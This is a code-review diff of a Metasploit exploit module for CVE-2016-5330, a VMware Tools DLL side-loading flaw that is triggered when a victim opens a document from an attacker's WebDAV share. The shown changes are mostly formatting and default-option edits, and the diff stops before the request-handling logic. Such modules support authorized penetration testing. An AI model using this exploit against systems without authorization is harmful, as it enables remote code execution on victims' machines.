Update vmhgfs_webdav_dll_sideload

Author: wchen-r7

modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb

@@ -1,4 +1,3 @@
-# Based on WebDAV Application DLL Hijacker module
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -9,54 +8,52 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'			=> 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
-      'Description'	=> %q{
+      'Name'           => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
+      'Description'    => %q{
       A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,
       a component of VMware Tools. This issue can be exploited by luring a victim into
       opening a document from the attacker's share. An attacker can exploit this issue to
       execute arbitrary code with the privileges of the target user. This can potentially
       result in the attacker taking complete control of the affected system. If the WebDAV
       Mini-Redirector is enabled, it is possible to exploit this issue over the internet.
       },
-      'Author'		=> 'Yorick Koster',
-      'License'		=> MSF_LICENSE,
-      'References' =>
+      'Author'         => 'Yorick Koster',
+      'License'        => MSF_LICENSE,
+      'References'     =>
         [
           ['CVE', '2016-5330'],
           ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],
           ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
-          'PAYLOAD' => 'windows/exec',
-          'CMD' => 'C:\\Windows\\System32\\calc.exe',
+          'EXITFUNC' => 'thread'
         },
-      'Payload'		=> { 'Space'	=> 2048, },
-      'Platform'		=> 'win',
-      'Targets' =>
+      'Payload'        => { 'Space' => 2048, },
+      'Platform'       => 'win',
+      'Targets'        =>
         [
-          [ 'Windows x64', {'Arch' => ARCH_X64,} ],
-          [ 'Windows x86', {'Arch' => ARCH_X86,} ],
+          [ 'Windows x64', {'Arch' => ARCH_X86_64,} ],
+          [ 'Windows x86', {'Arch' => ARCH_X86,} ]
         ],
-      'Privileged' => false,
+      'Privileged'     => false,
       'DisclosureDate' => 'Aug 5 2016',
-      'DefaultTarget' => 0))
+      'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptPort.new('SRVPORT',		[ true, "The daemon port to listen on (do not change)", 80 ]),
-        OptString.new('URIPATH',	[ true, "The URI to use (do not change)", "/" ]),
-        OptString.new('BASENAME',	[ true, "The base name for the docx file", "Document1" ]),
-        OptString.new('SHARENAME',	[ true, "The name of the top-level share", "documents" ]),
+        OptPort.new('SRVPORT',     [ true, "The daemon port to listen on (do not change)", 80 ]),
+        OptString.new('URIPATH',   [ true, "The URI to use (do not change)", "/" ]),
+        OptString.new('BASENAME',  [ true, "The base name for the docx file", "Document1" ]),
+        OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ])
       ], self.class)
 
-    deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL
+    # no SSL
+    deregister_options('SSL', 'SSLVersion', 'SSLCert')
   end
 
 
   def on_request_uri(cli, request)
-
     case request.method
     when 'OPTIONS'
       process_options(cli, request)